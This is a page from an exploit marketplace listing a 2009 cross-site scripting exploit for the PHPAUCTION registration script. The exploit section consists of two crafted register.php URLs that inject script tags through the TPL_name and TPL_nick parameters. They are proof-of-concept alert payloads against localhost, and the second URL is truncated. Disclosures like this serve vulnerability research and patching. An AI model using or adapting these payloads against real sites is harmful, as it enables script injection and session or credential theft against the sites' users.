[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPAUCTION Cross Site Scripting Vulnerability

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10408
Category
web applications
Date add
26-12-2009
Platform
unsorted
=============================================
PHPAUCTION Cross Site Scripting Vulnerability
=============================================

========================================================================================                 
| # Title    : PHPAUCTION Cross Site Scripting Vulnerability                           |
| # Author   : indoushka                                                               |
 # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # Script   : Copyright 2000-2009, PHPAUCTION.ORG                                     |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1-http://localhost/phpauction/register.php?TPL_name=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&TPL_nick=indoushka&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com
| 2- http://localhost/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com&TP



#  0day.today [2024-12-25]  #